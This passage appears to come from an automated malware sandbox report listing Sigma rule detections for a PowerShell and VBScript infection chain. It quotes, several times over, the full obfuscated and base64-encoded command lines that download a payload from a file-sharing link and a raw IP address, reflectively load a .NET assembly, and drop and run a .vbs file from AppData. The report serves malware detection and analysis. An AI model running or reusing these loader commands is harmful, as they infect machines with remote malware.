Dfw<<BASE64_START>>Dfw;hGaendFlag = Df'+'w<<BASE64_END>>Dfw;hGastartIndex = hGaimageText'+'.IndexOf(hGastartFlag);hGaendIndex = hGaimageText.IndexOf'+'(hGaendFlag);hGastartIndex -ge 0 -and hGaendIndex -gt hGas'+'tartIndex;hGastartIndex += hGastartF'+'lag.Length;hGabase64Length = hGaendIndex - hGastar'+'tIndex;hGabase64Command = hGaimageText.Substring(hGasta'+'rtIndex, hGabase64Length);hGabase64Reversed = -join (hGabase64Command.ToCharArray() N9Y ForEach-Object { hGa_ })[-1..-(hGabase64Command.Length)];hGacommandBytes = [System.Convert]::F'+'romBase64String(hGab'+'a'+'se64Reversed);hGaloadedAssembly = [System.Reflection.Assembly]::Load(hGacommandBytes);hGavaiM'+'ethod = [dnlib.IO'+'.Home].GetMethod(
          Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
          Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('hGaimageUrl = Dfwhttps://3105.file'+'mail.com/api/'+'file/get?fi'+'lekey=shTP'+'HbCPX8o-lO'+'tCqHLG6_0xCy-xl4tnxlAVbQ95-dviTK5cARaNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vid=e0109638c9bfb9571732531309b5ff7c Dfw;hGawebClient '+'= New-Object System.Net.WebClient;hGa'+'imageBytes = hGawebClient.D'+'ownload'+'Data(hGaimageUrl);hGai'+'mageText = [System.Text.Encoding]::UTF8.GetString(hGaimageBytes);hGastartFlag = Dfw<<BASE64_START>>Dfw;hGaendFlag = Df'+'w<<BASE64_END>>Dfw;hGastartIndex = hGaimageText'+'.IndexOf(hGastartFlag);hGaendIndex = hGaimageText.IndexOf'+'(hGaendFlag);hGastartIndex -ge 0 -and hGaendIndex -gt hGas'+'tartIndex;hGastartIndex += hGastartF'+'lag.Length;hGabase64Length = hGaendIndex - hGastar'+'tIndex;hGabase64Command = hGaimageText.Substring(hGasta'+'rtIndex, hGabase64Length);hGabase64Reversed = -join (hGabase64Command.ToCharArray() N9Y ForEach-Object { hGa_ })[-1..-(hGabase64Command.Length)];hGacommandBytes = [System.Convert]::F'+'romBase64String(hGab'+'a'+'se64Reversed);hGaloadedAssembly = [System.Reflection.Assembly]::Load(hGacommandBytes);hGavaiM'+'ethod = [dnlib.IO'+'.Home].GetMethod('+'DfwVAIDfw);hGavaiMethod.Invoke(hGanull, @(Dfwtxt.RTCCCRV/622/512.821.59.32//:ptthDfw, DfwdesativadoDfw, DfwdesativadoDfw, DfwdesativadoDfw, Dfwaspnet_compilerDfw, DfwdesativadoDfw, Dfwdesativ'+'ado'+'Dfw,DfwdesativadoDfw,DfwdesativadoDfw,DfwdesativadoDfw,Dfwdesa'+'tivadoDfw,DfwdesativadoDfw,Dfw1Dfw,Dfwd'+'esativadoDfw));') -cREpLACE([Char]68+[Char]102+[Char]119),[Char]39-cREpLACE 'N9Y',[Char]124-RePLACE ([Char]104+[Char]71+[Char]97),[Char]36)| .( $eNv:comsPEc[4,24,25]-JoIn'')", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('hGaimageUrl = Dfwhttps://3105.file'+'mail.com/api/'+'file/get?fi'+'lekey=shTP'+'HbCPX8o-lO'+'tCqHLG6_0xCy-xl4tnxlAVbQ95-dviTK5cARaNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vid=e0109638c9bfb9571732531309b5ff7c Dfw;hGawebClient '+'= New-Object System.Net.WebClient;hGa'+'imageBytes = hGawebClient.D'+'ownload'+'Data(hGaimageUrl);hGai'+'mageText = [System.Text.Encoding]::UTF8.GetString(hGaimageBytes);hGastartFlag = Dfw<<BASE64_START>>Dfw;hGaendFlag = Df'+'w<<BASE64_END>>Dfw;hGastartIndex = hGaimageText'+'.IndexOf(hGastartFlag);hGaendIndex = hGaimageText.IndexOf'+'(hGaendFlag);hGastartIndex -ge 0 -and hGaendIndex -gt hGas'+'tartIndex;hGastartIndex += hGastartF'+'lag.Length;hGabase64Length = hGaendIndex - hGastar'+'tIndex;hGabase64Command = hGaimageText.Substring(hGasta'+'rtIndex, hGabase64Length);hGabase64Reversed = -join (hGabase64Command.ToCharArray() N9Y ForEach-Object { hGa_ })[-1..-(hGabase64Command.Length)];hGacommandBytes = [System.Convert]::F'+'romBase64String(hGab'+'a'+'se64Reversed);hGaloadedAssembly = [System.Reflection.Assembly]::Load(hGacommandBytes);hGavaiM'+'ethod = [dnlib.IO'+'.Home].GetMethod(
          Sigma detected: Potentially Suspicious PowerShell Child Processes
          Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethepossiblethingsforentiretimetogivemebest.vBs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethepossiblethingsforentiretimetogivemebest.vBs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Windows\SYsTEM32\WiNdoWspOwERsHEll\V1.0\pOweRSHELL.eXE" "pOwERshELl.exE -eX ByPasS -NOP -w 1 -C deViCEcrEDEnTiAldePloYMeNT.eXE ; IeX($(IEx('[SYstEm.TExt.ENcODING]'+[Char]58+[cHAr]0X3A+'Utf8.geTSTRInG([sYsteM.cOnVert]'+[cHAr]0X3A+[CHaR]0x3A+'FroMbaSE64STRINg('+[cHAr]0x22+'JEJ5byAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFEZC1UeVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NRU1CRVJEZUZpTklUSU9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNb24uZExMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBqbCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeU56eG4sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRZdVksdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBRalVXbHdkYUNaVyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgd0EpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgImNUbiIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbUVzUEFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB5cWFMV2ZtcCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRCeW86OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8yMy45NS4xMjguMjE1LzIyNi9zZWV0aGVwb3NzaWJsZXRoaW5nc2ZvcmVudGlyZXRpbWV0b2dpdmVtZWJlc3QudElGIiwiJEVOdjpBUFBEQVRBXHNlZXRoZXBvc3NpYmxldGhpbmdzZm9yZW50aXJldGltZXRvZ2l2ZW1lYmVzdC52QnMiLDAsMCk7c3RBclQtc0xlZXAoMyk7SUkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTnY6QVBQREFUQVxzZWV0aGVwb3NzaWJsZXRoaW5nc2ZvcmVudGlyZXRpbWV0b2dpdmVtZWJlc3QudkJzIg=='+[cHar]34+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6248, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethepossiblethingsforentiretimetogivemebest.vBs" , ProcessId: 2044, ProcessName: wscript.exe
          Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
          Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnaEdhaW1hZ2VVcmwgPSBEZndodHRwczovLzMxMDUuZmlsZScrJ21haWwuY29tL2FwaS8nKydmaWxlL2dldD9maScrJ2xla2V5PXNoVFAnKydIYkNQWDhvLWxPJysndENxSExHNl8weEN5LXhsNHRueGxBVmJROTUtZHZpVEs1Y0FSYU5kUWpiYjNtZXhmd1F6S21UWGcmc2tpcHJlZz10cnVlJnBrX3ZpZD1lMDEwOTYzOGM5YmZiOTU3MTczMjUzMTMwOWI1ZmY3YyBEZnc7aEdhd2ViQ2xpZW50ICcrJz0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDtoR2EnKydpbWFnZUJ5dGVzID0gaEdhd2ViQ2xpZW50LkQnKydvd25sb2FkJysnRGF0YShoR2FpbWFnZVVybCk7aEdhaScrJ21hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoaEdhaW1hZ2VCeXRlcyk7aEdhc3RhcnRGbGFnID0gRGZ3PDxCQVNFNjRfU1RBUlQ+PkRmdztoR2FlbmRGbGFnID0gRGYnKyd3PDxCQVNFNjRfRU5EPj5EZnc7aEdhc3RhcnRJbmRleCA9IGhHYWltYWdlVGV4dCcrJy5JbmRleE9mKGhHYXN0YXJ0RmxhZyk7aEdhZW5kSW5kZXggPSBoR2FpbWFnZVRleHQuSW5kZXhPZicrJyhoR2FlbmRGbGFnKTtoR2FzdGFydEluZGV4IC1nZSAwIC1hbmQgaEdhZW5kSW5kZXggLWd0IGhHYXMnKyd0YXJ0SW5kZXg7aEdhc3RhcnRJbmRleCArPSBoR2FzdGFydEYnKydsYWcuTGVuZ3RoO2hHYWJhc2U2NExlbmd0aCA9IGhHYWVuZEluZGV4IC0gaEdhc3RhcicrJ3RJbmRleDtoR2FiYXNlNjRDb21tYW5kID0gaEdhaW1hZ2VUZXh0LlN1YnN0cmluZyhoR2FzdGEnKydydEluZGV4LCBoR2FiYXNlNjRMZW5ndGgpO2hHYWJhc2U2NFJldmVyc2VkID0gLWpvaW4gKGhHYWJhc2U2NENvbW1hbmQuVG9DaGFyQXJyYXkoKSBOOVkgRm9yRWFjaC1PYmplY3QgeyBoR2FfIH0pWy0xLi4tKGhHYWJhc2U2NENvbW1hbmQuTGVuZ3RoKV07aEdhY29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6RicrJ3JvbUJhc2U2NFN0cmluZyhoR2FiJysnYScrJ3NlNjRSZXZlcnNlZCk7aEdhbG9hZGVkQXNzZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKGhHYWNvbW1hbmRCeXRlcyk7aEdhdmFpTScrJ2V0aG9kID0gW2RubGliLklPJysnLkhvbWVdLkdldE1ldGhvZCgnKydEZndWQUlEZncpO2hHYXZhaU1ldGhvZC5JbnZva2UoaEdhbnVsbCwgQChEZnd0eHQuUlRDQ0NSVi82MjIvNTEyLjgyMS41OS4zMi8vOnB0dGhEZncsIERmd2Rlc2F0aXZhZG9EZncsIERmd2Rlc2F0aXZhZG9EZncsIERmd2Rlc2F0aXZhZG9EZncsIERmd2FzcG5ldF9jb21waWxlckRmdywgRGZ3ZGVzYXRpdmFkb0RmdywgRGZ3ZGVzYXRpdicrJ2FkbycrJ0RmdyxEZndkZXNhdGl2YWRvRGZ3LERmd2Rlc2F0aXZhZG9EZncsRGZ3ZGVzYXRpdmFkb0RmdyxEZndkZXNhJysndGl2YWRvRGZ3LERmd2Rlc2F0aXZhZG9EZncsRGZ3MURmdyxEZndkJysnZXNhdGl2YWRvRGZ3KSk7JykgIC1jUkVwTEFDRShbQ2hhcl02OCtbQ2hhcl0xMDIrW0NoYXJdMTE5KSxbQ2hhcl0zOS1jUkVwTEFDRSAgJ045WScsW0NoYXJdMTI0LVJlUExBQ0UgIChbQ2hhcl0xMDQrW0NoYXJdNzErW0NoYXJdOTcpLFtDaGFyXTM2KXwgLiggJGVOdjpjb21zUEVjWzQsMjQsMjVdLUpvSW4nJyk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnaEdhaW1hZ2VVcmwgPSBEZndodHRwczovLzMxMDUuZmlsZScrJ21haWwuY29tL2FwaS8nKydmaWxlL2dldD9maScrJ2xla2V5PXNoVFAnKydIYkNQWDhvLWxPJysndENxSExHNl8weEN5LXhsNHRueGxBVmJROTUtZHZpVEs1Y0FSYU5kUWpiYjNtZXhmd1F6S21UWGcmc2tpcHJlZz10cnVlJnBrX3ZpZD1lMDEwOTYzOGM5YmZiOTU3MTczMjUzMTMwOWI1ZmY3YyBEZnc7aEdhd2ViQ2xpZW50ICcrJz0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDtoR2EnKydpbWFnZUJ5dGVzID0gaEdhd2ViQ2xpZW50LkQnKydvd25sb2FkJysnRGF0YShoR2FpbWFnZVVybCk7aEdhaScrJ21hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6
          Sigma detected: Suspicious MSHTA Child Process
          Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\SYsTEM32\WiNdoWspOwERsHEll\V1.0\pOweRSHELL.eXE" "pOwERshELl.exE -eX ByPasS -NOP -w 1 -C deViCEcrEDEnTiAldePloYMeNT.eXE ; IeX($(IEx('[SYstEm.TExt.ENcODING]'+[Char]58+[cHAr]0X3A+'Utf8.geTSTRInG([sYsteM.cOnVert]'+[cHAr]0X3A+[CHaR]0x3A+'FroMbaSE64STRINg('+[cHAr]0x22+'JEJ5byAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFEZC1UeVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NRU1CRVJEZUZpTklUSU9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNb24uZExMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBqbCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeU56eG4sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRZdVksdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBRalVXbHdkYUNaVyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgd0EpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgImNUbiIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbUVzUEFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB5cWFMV2ZtcCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRCeW86OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8yMy45NS4xMjguMjE1LzIyNi9zZWV0aGVwb3NzaWJsZXRoaW5nc2ZvcmVudGlyZXRpbWV0b2dpdmVtZWJlc3QudElGIiwiJEVOdjpBUFBEQVRBXHNlZXRoZXBvc3NpYmxldGhpbmdzZm9yZW50aXJldGltZXRvZ2l2ZW1lYmVzdC52QnMiLDAsMCk7c3RBclQtc0xlZXAoMyk7SUkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTnY6QVBQREFUQVxzZWV0aGVwb3NzaWJsZXRoaW5nc2ZvcmVudGlyZXRpbWV0b2dpdmVtZWJlc3QudkJzIg=='+[cHar]34+'))')))", CommandLine: "C:\Windows\SYsTEM32\WiNdoWspOwERsHEll\V1.0\pOweRSHELL.eXE" "pOwERshELl.exE -eX ByPasS -NOP -w 1 -C deViCEcrEDEnTiAldePloYMeNT.eXE ; IeX($(IEx('[SYstEm.TExt.ENcODING]'+[Char]58+[cHAr]0X3A+'Utf8.geTSTRInG([sYsteM.cOnVert]'+[cHAr]0X3A+[CHaR]0x3A+'FroMbaSE64STRINg('+[cHAr]0x22+'JEJ5byAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFEZC1UeVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NRU1CRVJEZUZpTklUSU9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNb24uZExMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBqbCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeU56eG4sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRZdVksdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBRalVXbHdkYUNaVyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgd0E
          Sigma detected: Suspicious PowerShell Parameter Substring
          Source: Process startedAuthor: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -eX ByPasS -NOP -w 1 -C deViCEcrEDEnTiAldePloYMeNT.eXE, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -eX ByPasS -NOP -w 1 -C deViCEcrEDEnTiAldePloYMeNT.eXE, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\SYsTEM32\WiNdoWspOwERsHEll\V1.0\pOweRSHELL.eXE" "pOwERshELl.exE -eX ByPasS -NOP -w 1 -C deViCEcrEDEnTiAldePloYMeNT.eXE ; IeX($(IEx('[SYstEm.TExt.ENcODING]'+[Char]58+[cHAr]0X3A+'Utf8.geTSTRInG([sYsteM.cOnVert]'+[cHAr]0X3A+[CHaR]0x3A+'FroMbaSE64STRINg('+[cHAr]0x22+'JEJ5byAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFEZC1UeVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NRU1CRVJEZUZpTklUSU9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNb24uZExMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBqbCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeU56eG4sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRZdVksdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBRalVXbHdkYUNaVyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgd0EpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgImNUbiIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbUVzUEFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB5cWFMV2ZtcCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRCeW86OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8yMy45NS4xMjguMjE1LzIyNi9zZWV0aGVwb3NzaWJsZXRoaW5nc2ZvcmVudGlyZXRpbWV0b2dpdmVtZWJlc3QudElGIiwiJEVOdjpBUFBEQVRBXHNlZXRoZXBvc3NpYmxldGhpbmdzZm9yZW50aXJldGltZXRvZ2l2ZW1lYmVzdC52QnMiLDAsMCk7c3RBclQtc0xlZXAoMyk7SUkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTnY6QVBQREFUQVxzZWV0aGVwb3NzaWJsZXRoaW5nc2ZvcmVudGlyZXRpbWV0b2dpdmVtZWJlc3QudkJzIg=='+[cHar]34+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6248, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -eX ByPasS -NOP -w 1 -C deViCEcrEDEnTiAldePloYMeNT.eXE, ProcessId: 2336, ProcessName: powershell.exe
          Sigma detected: WScript or CScript Dropper
          Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethepossiblethingsforentiretimetogivemebest.vBs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethepossiblethingsforentiretimetogivemebest.vBs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Windows\SYsTEM32\WiNdoWspOwERsHEll\V1.0\pOweRSHELL.eXE" "pOwERshELl.exE -eX ByPasS -NOP -w 1 -C deViCEcrEDEnTiAldePloYMeNT.eXE ; IeX($(IEx('[SYstEm.TExt.ENcODING]'+[Char]58+[cHAr]0X3A+'Utf8.geTSTRInG([sYsteM.cOnVert]'+[cHAr]0X3A+[CHaR]0x3A+'FroMbaSE64STRINg('+[cHAr]0x22+'JEJ5byAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFEZC1UeVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NRU1CRVJEZUZpTklUSU9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNb24uZExMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBqbCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeU56eG4sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRZdVksdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBRalVXbHdkYUNaVyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgd0EpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgImNUbiIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbUVzUEFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB5cWFMV2ZtcCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRCeW86OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8yMy45NS4xMjguMjE1LzIyNi9zZWV0aGVwb3NzaWJsZXRoaW5nc2ZvcmVudGlyZXRpbWV0b2dpdmVtZWJlc3QudElGIiwiJEVOdjpBUFBEQVRBXHNlZXRoZXBvc3NpYmxldGhpbmdzZm9yZW50aXJldGltZXRvZ2l2ZW1lYmVzdC52QnMiLDAsMCk7c3RBclQtc0xlZXAoMyk7SUkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTnY6QVBQREFUQVxzZWV0aGVwb3NzaWJsZXRoaW5nc2ZvcmVudGlyZXRpbWV0b2dpdmVtZWJlc3QudkJzIg=='+[cHar]34+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6248, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethepossiblethingsforentiretimetogivemebest.vBs" , ProcessId: 2044, ProcessName: wscript.exe
          Sigma detected: Change PowerShell Policies to an Insecure Level
          Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnaEdhaW1hZ2VVcmwgPSBEZndodHRwczovLzMxMDUuZmlsZScrJ21haWwuY29tL2FwaS8nKydmaWxlL2dldD9maScrJ2xla2V5PXNoVFAnKydIYkNQWDhvLWxPJysndENxSExHNl8weEN5LXhsNHRueGxBVmJROTUtZHZpVEs1Y0FSYU5kUWpiYjNtZXhmd1F6S21UWGcmc2tpcHJlZz10cnVlJnBrX3ZpZD1lMDEwOTYzOGM5YmZiOTU3MTczMjUzMTMwOWI1ZmY3YyBEZnc7aEdhd2ViQ2xpZW50ICcrJz0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDtoR2EnKydpbWFnZUJ5dGVzID0gaEdhd2ViQ2xpZW50LkQnKydvd25sb2FkJysnRGF0YShoR2FpbWFnZVVybCk7aEdhaScrJ21hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoaEdhaW1hZ2VCeXRlcyk7aEdhc3RhcnRGbGFnID0gRGZ3PDxCQVNFNjRfU1RBUlQ+PkRmdztoR2FlbmRGbGFnID0gRGYnKyd3PDxCQVNFNjRfRU5EPj5EZnc7aEdhc3RhcnRJbmRleCA9IGhHYWltYWdlVGV4dCcrJy5JbmRleE9mKGhHYXN0YXJ0RmxhZyk7aEdhZW5kSW5kZXggPSBoR2FpbWFnZVRleHQuSW5kZXhPZicrJyhoR2FlbmRGbGFnKTtoR2FzdGFydEluZGV4IC1nZSAwIC1hbmQgaEdhZW5kSW5kZXggLWd0IGhHYXMnKyd0YXJ0SW5kZXg7aEdhc3RhcnRJbmRleCArPSBoR2FzdGFydEYnKydsYWcuTGVuZ3RoO2hHYWJhc2U2NExlbmd0aCA9IGhHYWVuZEluZGV4IC0gaEdhc3RhcicrJ3RJbmRleDtoR2FiYXNlNjRDb21tYW5kID0gaEdhaW1hZ2VUZXh0LlN1YnN0cmluZyhoR2FzdGEnKydydEluZGV4LCBoR2FiYXNlNjRMZW5ndGgpO2hHYWJhc2U2NFJldmVyc2VkID0gLWpvaW4gKGhHYWJhc2U2NENvbW1hbmQuVG9DaGFyQXJyYXkoKSBOOVkgRm9yRWFjaC1PYmplY3QgeyBoR2FfIH0pWy0xLi4tKGhHYWJhc2U2NENvbW1hbmQuTGVuZ3RoKV07aEdhY29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6RicrJ3JvbUJhc2U2NFN0cmluZyhoR2FiJysnYScrJ3NlNjRSZXZlcnNlZCk7aEdhbG9hZGVkQXNzZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKGhHYWNvbW1hbmRCeXRlcyk7aEdhdmFpTScrJ2V0aG9kID0gW2RubGliLklPJysnLkhvbWVdLkdldE1ldGhvZCgnKydEZndWQUlEZncpO2hHYXZhaU1ldGhvZC5JbnZva2UoaEdhbnVsbCwgQChEZnd0eHQuUlRDQ0NSVi82MjIvNTEyLjgyMS41OS4zMi8vOnB0dGhEZncsIERmd2Rlc2F0aXZhZG9EZncsIERmd2Rlc2F0aXZhZG9EZncsIERmd2Rlc2F0aXZhZG9EZncsIERmd2FzcG5ldF9jb21waWxlckRmdywgRGZ3ZGVzYXRpdmFkb0RmdywgRGZ3Z